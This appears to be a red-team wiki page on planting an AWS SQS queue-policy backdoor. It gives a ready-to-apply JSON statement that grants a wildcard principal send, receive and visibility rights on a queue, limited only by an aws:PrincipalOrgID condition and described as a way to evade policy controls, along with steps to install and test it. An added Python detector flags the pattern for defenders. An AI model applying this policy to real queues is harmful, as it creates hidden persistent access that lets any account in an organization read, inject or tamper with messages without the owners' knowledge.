AWS - SQS OrgID Policy Backdoor


tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Abuse an SQS queue resource policy to silently grant SendMessage, ReceiveMessage and ChangeMessageVisibility to any principal that belongs to a target AWS Organization, using the condition key aws:PrincipalOrgID. The statement uses Principal "*" but is restricted by the condition, so it creates an org-scoped hidden path that often evades controls which only flag explicit account or role ARNs or an unconditioned wildcard (*) principal. Because aws:PrincipalOrgID only matches authenticated IAM principals, anonymous callers gain nothing; every account in the organization does.

Backdoor policy (add this statement to the SQS queue policy)

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "OrgScopedBackdoor",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "sqs:ReceiveMessage",
        "sqs:SendMessage",
        "sqs:ChangeMessageVisibility",
        "sqs:GetQueueAttributes"
      ],
      "Resource": "arn:aws:sqs:REGION:ACCOUNT_ID:QUEUE_NAME",
      "Condition": {
        "StringEquals": { "aws:PrincipalOrgID": "o-xxxxxxxxxx" }
      }
    }
  ]
}
```

Steps

  • Obtain the Organization ID with the AWS Organizations API.
  • Get the SQS queue ARN and set the queue policy so that it includes the statement above.
  • From any principal that belongs to that Organization, send and receive a message on the queue to validate access.
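A defender-side check for this pattern, added here and not part of the original page: it parses a queue policy document (the string boto3 returns from get_queue_attributes with AttributeNames=['Policy']) and reports every Allow statement that pairs a wildcard principal with a message read/write action gated by aws:PrincipalOrgID, flagging org IDs that differ from the one you expect. The sample policy, queue ARN, role and org IDs are constructed.

```python
import json

# Constructed sample: the org-scoped statement from this page plus a benign
# single-role statement that the scan should ignore.
SAMPLE_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "OrgScopedBackdoor", "Effect": "Allow", "Principal": "*",
     "Action": ["sqs:ReceiveMessage", "sqs:SendMessage",
                "sqs:ChangeMessageVisibility", "sqs:GetQueueAttributes"],
     "Resource": "arn:aws:sqs:us-east-1:111111111111:orders",
     "Condition": {"StringEquals": {"aws:PrincipalOrgID": "o-xxxxxxxxxx"}}},
    {"Sid": "ProducerOnly", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::111111111111:role/producer"},
     "Action": "sqs:SendMessage",
     "Resource": "arn:aws:sqs:us-east-1:111111111111:orders"}]})

DATA_ACTIONS = {"sqs:sendmessage", "sqs:receivemessage",  # read, inject, tamper
                "sqs:changemessagevisibility", "sqs:deletemessage", "sqs:*"}

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _is_wildcard_principal(principal):
    # Either the bare "*" or {"AWS": "*"} / {"AWS": ["*", ...]}.
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))

def _org_ids(condition):
    # aws:PrincipalOrgID under any String* operator; IAM keys are case-insensitive.
    ids = []
    for operator, pairs in (condition or {}).items():
        if operator.startswith("String"):
            for key, val in pairs.items():
                if key.lower() == "aws:principalorgid":
                    ids.extend(_as_list(val))
    return ids

def find_org_scoped_grants(policy_json, expected_org_id=None):
    """Return (sid, org_id, foreign) for every Allow statement granting a wildcard
    principal a data action under aws:PrincipalOrgID; foreign = org != expected."""
    findings = []
    for stmt in _as_list(json.loads(policy_json).get("Statement", [])):
        actions = {a.lower() for a in _as_list(stmt.get("Action", []))}
        if (stmt.get("Effect") != "Allow" or not actions & DATA_ACTIONS
                or not _is_wildcard_principal(stmt.get("Principal"))):
            continue
        for org in _org_ids(stmt.get("Condition")):
            foreign = expected_org_id is not None and org != expected_org_id
            findings.append((stmt.get("Sid", "<no-sid>"), org, foreign))
    return findings
```

Run it over every queue in every account during a periodic policy audit; even a match on your own org ID deserves review, since it grants the whole organization rather than a named principal.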

Impact

  • Organization-wide hidden access to read and write SQS messages from any account in the specified AWS Organization.
